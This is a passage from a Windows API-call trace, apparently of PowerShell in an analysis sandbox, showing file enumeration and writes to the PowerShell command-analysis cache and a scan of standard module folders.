ftLastWriteTime.dwLowDateTime=0x6961a810, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x5f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f43e45e7-eef6-4380-a936-f696031c993f", cAlternateFileName="POB782~1")) returned 1 [0226.316] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6658e7c6, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6658e7c6, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6658e7c6, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x75b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f5e93b08-2455-4486-a2c2-913fd6c7224d", cAlternateFileName="POC788~1")) returned 1 [0226.316] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69c368e0, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x69c368e0, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x69c368e0, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x3d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f88c3686-23f7-468a-8f1e-6661f2bebd63", cAlternateFileName="POD64E~1")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e2e2ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e2e2ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd58e1f9d, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_f9e52a2e-51b0-4ce6-9de0-3959d95ded6e", cAlternateFileName="POE0DC~1")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6993b7fa, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6993b7fa, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6993b7fa, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_fcb68585-4582-4806-bd37-77df518863bb", cAlternateFileName="PO0947~1")) returned 1 [0226.317] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.317] FindClose (in: hFindFile=0x25b73cd1530 | out: hFindFile=0x25b73cd1530) returned 1 [0226.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8deb0) returned 1 [0226.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de60) returned 1 [0226.324] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d9460 [0226.324] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b739d9460 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0226.324] CoTaskMemFree (pv=0x25b739d9460) [0226.324] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0226.324] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0226.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dd50) returned 1 [0226.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8de30 | out: lpFileInformation=0x653ef8de30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0226.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd10) returned 1 [0226.325] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0226.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc90) returned 1 [0226.325] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7dc [0226.325] GetFileType (hFile=0x7dc) returned 0x1 [0226.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dc00) returned 1 [0226.325] GetFileType (hFile=0x7dc) returned 0x1 [0226.325] SetEndOfFile (hFile=0x7dc) returned 1 [0226.884] WriteFile (in: hFile=0x7dc, lpBuffer=0x25b5c145fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c145fb8*, lpNumberOfBytesWritten=0x653ef8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0226.885] WriteFile (in: hFile=0x7dc, lpBuffer=0x25b5c145fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8d6a8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c145fb8*, lpNumberOfBytesWritten=0x653ef8d6a8*=0x1000, lpOverlapped=0x0) returned 1 [0226.886] WriteFile (in: hFile=0x7dc, lpBuffer=0x25b5c145fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8d658, lpOverlapped=0x0 | out: lpBuffer=0x25b5c145fb8*, lpNumberOfBytesWritten=0x653ef8d658*=0x1000, lpOverlapped=0x0) returned 1 [0226.886] WriteFile (in: hFile=0x7dc, lpBuffer=0x25b5c145fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c145fb8*, lpNumberOfBytesWritten=0x653ef8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0226.887] WriteFile (in: hFile=0x7dc, lpBuffer=0x25b5c145fb8*, nNumberOfBytesToWrite=0xced, lpNumberOfBytesWritten=0x653ef8dd98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c145fb8*, lpNumberOfBytesWritten=0x653ef8dd98*=0xced, lpOverlapped=0x0) returned 1 [0226.894] CloseHandle (hObject=0x7dc) returned 1 [0226.897] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8dba0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0226.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e030) returned 1 [0226.902] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c152298 | out: lpFileInformation=0x25b5c152298*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0226.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dff0) returned 1 [0226.905] ReleaseMutex (hMutex=0x6f4) returned 1 [0226.908] CoCreateGuid (in: pguid=0x653ef8e058 | out: pguid=0x653ef8e058*(Data1=0xb915386c, Data2=0xe0a8, Data3=0x483b, Data4=([0]=0x9c, [1]=0x64, [2]=0x8c, [3]=0x14, [4]=0xd, [5]=0x93, [6]=0xcb, [7]=0xdb))) returned 0x0 [0226.927] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7dc [0226.927] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7f0 [0226.927] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f4 [0226.927] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f8 [0226.927] SetEvent (hEvent=0x7f8) returned 1 [0226.927] SetEvent (hEvent=0x7dc) returned 1 [0226.927] SetEvent (hEvent=0x7f0) returned 1 [0226.927] SetEvent (hEvent=0x7f4) returned 1 [0226.929] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7fc [0226.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.065] EtwEventActivityIdControl () returned 0x0 [0227.065] EtwEventActivityIdControl () returned 0x0 [0227.065] EtwEventActivityIdControl () returned 0x0 [0227.675] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d89c0 [0227.675] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b739d89c0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0227.675] CoTaskMemFree (pv=0x25b739d89c0) [0227.675] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0227.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d660) returned 1 [0227.675] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d740 | out: lpFileInformation=0x653ef8d740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d620) returned 1 [0227.680] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0227.690] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0227.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d660) returned 1 [0227.690] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d740 | out: lpFileInformation=0x653ef8d740*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d620) returned 1 [0227.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0227.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d660) returned 1 [0227.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d740 | out: lpFileInformation=0x653ef8d740*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0227.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d620) returned 1 [0227.691] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d9460 [0227.691] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b739d9460, nSize=0x105 | out: lpBuffer="") returned 0x97 [0227.691] CoTaskMemFree (pv=0x25b739d9460) [0227.691] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0227.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d660) returned 1 [0227.691] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d740 | out: lpFileInformation=0x653ef8d740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d620) returned 1 [0227.693] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0227.703] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0227.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d660) returned 1 [0227.704] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d740 | out: lpFileInformation=0x653ef8d740*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0227.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d620) returned 1 [0227.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0227.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d660) returned 1 [0227.704] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d740 | out: lpFileInformation=0x653ef8d740*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0227.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d620) returned 1 [0227.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d570) returned 1 [0227.704] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0227.705] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8d280 | out: lpFindFileData=0x653ef8d280*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1770 [0227.705] FindNextFileW (in: hFindFile=0x25b73cd1770, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.705] FindNextFileW (in: hFindFile=0x25b73cd1770, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0227.705] FindNextFileW (in: hFindFile=0x25b73cd1770, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0227.706] FindNextFileW (in: hFindFile=0x25b73cd1770, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0227.706] FindNextFileW (in: hFindFile=0x25b73cd1770, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0227.706] FindNextFileW (in: hFindFile=0x25b73cd1770, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.706] FindClose (in: hFindFile=0x25b73cd1770 | out: hFindFile=0x25b73cd1770) returned 1 [0227.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d4a0) returned 1 [0227.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d460) returned 1 [0227.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d570) returned 1 [0227.706] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8d050, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0227.706] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x653ef8d280 | out: lpFindFileData=0x653ef8d280*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1ef0 [0227.707] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.707] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0227.707] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0227.707] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0227.708] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d240 | out: lpFindFileData=0x653ef8d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0227.708] 